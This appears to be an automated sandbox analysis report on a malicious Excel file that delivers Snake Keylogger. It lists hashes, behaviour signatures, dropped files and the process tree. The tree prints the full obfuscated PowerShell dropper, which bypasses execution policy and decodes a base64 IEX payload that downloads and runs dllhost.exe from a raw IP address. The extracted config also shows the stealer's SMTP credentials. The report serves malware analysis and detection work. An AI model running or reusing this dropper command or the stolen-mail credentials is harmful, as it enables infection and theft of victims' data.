Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    01-10-2024 12:11

General

  • Target

    AE11690106202.xls

  • Size

    640KB

  • MD5

    20e619e98752c941405d8bc0c66242b9

  • SHA1

    0320eeb4e91a97d2d78f1ddb196ff09ca7a95da0

  • SHA256

    5f7ede06fa8da808f891e29fcfc533fcab3f7e9bc02ad68d0e5b24fe006fcbe5

  • SHA512

    1a7f5cb0e1af193d9e6e07b4653648d607c4e931b32be475c0808fdd33a55a1e4257db456f8bda32f69ee09e07ba48248163127b72939eca17619110e997bdc2

  • SSDEEP

    12288:3S6nskrDE0NvKwm3HzxoO1e1ic6yWK0VceVnV2EVS7IIM:3S6nrNvIoOcl637rnV2Ey/M

Malware Config

Extracted

Family

snakekeylogger

Credentials

  • Protocol:
    smtp
  • Host:
    mail.kotobagroup.com
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    Kotoba@2022!

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 4 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\AE11690106202.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2172
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2804
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C PoWErShELL -EX ByPASS -NOp -w 1 -C deVicECrEdEntiAlDEPloYMeNT.exe ; iEX($(IEx('[sYStEm.text.encODinG]'+[ChAR]0X3A+[CHAr]58+'UTf8.gEtSTrIng([systEM.ConvERT]'+[chaR]58+[ChAr]0X3A+'fromBasE64strIng('+[ChAR]34+'JDdZOVg2a1NJMVUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVSRGVGaU5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cVloakVseixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTWE9XUEtnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExSbkZTTSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnd6eGdDeU8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU05DQkxtZik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIktIYmtPb1MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWVzUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlKUnlETnJlRyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN1k5WDZrU0kxVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjkvNzgwL2RsbGhvc3QuZXhlIiwiJGVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJULVNMZUVwKDMpO1NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[Char]34+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1736
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PoWErShELL -EX ByPASS -NOp -w 1 -C deVicECrEdEntiAlDEPloYMeNT.exe ; iEX($(IEx('[sYStEm.text.encODinG]'+[ChAR]0X3A+[CHAr]58+'UTf8.gEtSTrIng([systEM.ConvERT]'+[chaR]58+[ChAr]0X3A+'fromBasE64strIng('+[ChAR]34+'JDdZOVg2a1NJMVUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVSRGVGaU5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cVloakVseixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTWE9XUEtnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExSbkZTTSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnd6eGdDeU8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU05DQkxtZik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIktIYmtPb1MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWVzUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlKUnlETnJlRyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN1k5WDZrU0kxVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjkvNzgwL2RsbGhvc3QuZXhlIiwiJGVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJULVNMZUVwKDMpO1NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[Char]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2452
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\k7sbogbn.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2336
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD7E9.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD7E8.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1552
        • C:\Users\Admin\AppData\Roaming\dllhost.exe
          "C:\Users\Admin\AppData\Roaming\dllhost.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:2936
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Users\Admin\AppData\Roaming\dllhost.exe"
            5⤵
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:2980

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    1KB

    MD5

    7fb5fa1534dcf77f2125b2403b30a0ee

    SHA1

    365d96812a69ac0a4611ea4b70a3f306576cc3ea

    SHA256

    33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

    SHA512

    a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    436B

    MD5

    971c514f84bba0785f80aa1c23edfd79

    SHA1

    732acea710a87530c6b08ecdf32a110d254a54c8

    SHA256

    f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

    SHA512

    43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    174B

    MD5

    83d95c4ebc601b76bbf43d391ae74782

    SHA1

    d0eb5ae0b48034c9577c73c0a8f60c88c154362f

    SHA256

    55f9af2fda30fe01c50ee911f06218ea9103b92a712b9950e361131f9b9963ee

    SHA512

    ba80f89171eebd85aace8bf609fa0804a6fb508155fee4c71439f7b983bef356b0f727f8ffc065fb5c595423b1ebce5a1cc8fec30ea3bedb951d2b19adda9287

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    170B

    MD5

    175c3b270653835030e075d51e531d2d

    SHA1

    b7cc1faf9f09a3c318654b7cd57cc7d271f795bf

    SHA256

    b8c2a5e2005d72cee96a0f46bd5bd0e18c16c748e2b551aab932ea26b638b3f7

    SHA512

    ab7eae16f4805831d67c50ecfd22d6e2d5d6db1ad094e88014d05c4e26b516bae8822479303c79704f60401ec6a65f84cd6091d64186aa8c7148f5509c7ebf4d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6XUZ2JLF\IEnetbookupdation[1].hta

    Filesize

    8KB

    MD5

    c5ceccd555df7698d730dbf80adc5c50

    SHA1

    b1973f00b359aadce3a356c158f1f266f202e046

    SHA256

    19123f85ee5488a249fa8f2260b3c8d75e3cd83ac75e2a4371edd9580e6b37ca

    SHA512

    cdd2f7bb931f7dbd1a6f3a2e4cba96366402ef66be9c7ad70d809e3b09b7a86af662bb86732614b1531701a7e3a2bff5419293e0d210fa7a87bae146f87b0032

  • C:\Users\Admin\AppData\Local\Temp\CabCF31.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESD7E9.tmp

    Filesize

    1KB

    MD5

    52b1d9dcc1c484d71a4b0792bd12d219

    SHA1

    7d2184c7151d05515944c386c73542e664a65b58

    SHA256

    7fd3fa9ec2007ef19261b81401de2a618f06ef19f3ec35ba65911f22a9cd8563

    SHA512

    41dc82a54bb826ca8e9f5637dd2cd6b64aced9e1d3f15350170a3207d4bdc7ece1470adfe514f87e377af54e731a77bdff1cd05fd30f6bcc36e3f30998ec5325

  • C:\Users\Admin\AppData\Local\Temp\k7sbogbn.dll

    Filesize

    3KB

    MD5

    d77fb1ab8a8f4e20553c78e1df7ec052

    SHA1

    5a4b4d78c69f83ee41c21ddf723fd29aad7f4621

    SHA256

    883e6a85935e2fcdf991d8778ba23f7686bd40d5d78cefa98cc7cdddb61baec4

    SHA512

    7142a03cfc8d636cb13a5a10aed77f2800afc71ac9711aa92d250ee29a4ad41023c44063dfcf29dab9f04601a53e8baef4e3fa3c8fec6cdc2ec2ed1b07447c45

  • C:\Users\Admin\AppData\Local\Temp\k7sbogbn.pdb

    Filesize

    7KB

    MD5

    3680381b83f26446d04de2c03a5a5f43

    SHA1

    79270f87a7b4b1eaf77d08db72adbbab2172802a

    SHA256

    d26060741dab3ff4aeaa6cf1b26859241cddc79d6d574a1afa8a48c773c9ac7a

    SHA512

    f03d379272fd1a79ad3cdd4a88d92dbf6f09d8f9673808f5358a03fde80911b08dcf0f78a38b2e22a5a77fb05b6a2c190be65e1d7eb558da570f0af78631d430

  • C:\Users\Admin\AppData\Roaming\dllhost.exe

    Filesize

    1008KB

    MD5

    46ce226283fb84a52a6a902fc7032363

    SHA1

    c3bb1c73525de62dc7756ad40574ad6c6c148996

    SHA256

    9f3a7c1a4cc7e6e68e610bdce33046edb090a648e362ab8d3df8ba72561e1482

    SHA512

    36ea4f80512c7b20d1c34406b6bdd77f64831c4569d7cb4418d4904dffdb8d33e3b6e4f37fa2b949449c04569bd1f9dc3dd010027de288ab2f8ac9de02d4f34d

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCD7E8.tmp

    Filesize

    652B

    MD5

    307e1c862712fd27d48076075d91a940

    SHA1

    0d2afe5c9c0266d195aec5684da85838db699952

    SHA256

    ebacfdc603fa2a1788bf69995fb5796a7889d190345df8d0cf44536da6271b5c

    SHA512

    92191eb38fa8abc3f03713cfc4fb6a36f9e254c3c653178d94c17573409df2366d85ae9591b652356a957e868f0cd89b85e3f4e092a7642e97646241eab909ac

  • \??\c:\Users\Admin\AppData\Local\Temp\k7sbogbn.0.cs

    Filesize

    485B

    MD5

    526cb8f584c9e67eaad8958503b05f30

    SHA1

    2c52fac6e929f46dcb4b0cdbeab72cfb806a2c87

    SHA256

    af9253507cbd12a1875ffc8b02988ef5bccc511c7c77614cb34c5115b42c5b76

    SHA512

    5552f12bb883f18c7901a8d873eb1beaab9aa2e06a213ab476ef5a21b00faa69ab438261b7612c7be0cbd3d9f6086a1861c4f28ab3df41969d227eabbe0d9619

  • \??\c:\Users\Admin\AppData\Local\Temp\k7sbogbn.cmdline

    Filesize

    309B

    MD5

    a2cb988b5f1c9c10cccf05bb4d791cdb

    SHA1

    f37116a04c2f8f3188a16fcf782ea275f61b77e6

    SHA256

    3f999416ae344024d2cdcb6e0a218cdbae11dab93d036249e8d773bb11c88912

    SHA512

    7df0689d7088a7e59f9b29e2aaba6f0f838fef1dac524f47e1e929391dbda4274ec9f27626054feda8a72a535f9a1e0f1676d3d019a51124ffc8e95535c32cc3

  • memory/2172-17-0x0000000002410000-0x0000000002412000-memory.dmp

    Filesize

    8KB

  • memory/2172-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2172-1-0x000000007250D000-0x0000000072518000-memory.dmp

    Filesize

    44KB

  • memory/2172-55-0x000000007250D000-0x0000000072518000-memory.dmp

    Filesize

    44KB

  • memory/2804-16-0x00000000027C0000-0x00000000027C2000-memory.dmp

    Filesize

    8KB

  • memory/2980-64-0x00000000000D0000-0x00000000000F6000-memory.dmp

    Filesize

    152KB

  • memory/2980-70-0x00000000000D0000-0x00000000000F6000-memory.dmp

    Filesize

    152KB

  • memory/2980-65-0x00000000000D0000-0x00000000000F6000-memory.dmp

    Filesize

    152KB

  • memory/2980-72-0x00000000000D0000-0x00000000000F6000-memory.dmp

    Filesize

    152KB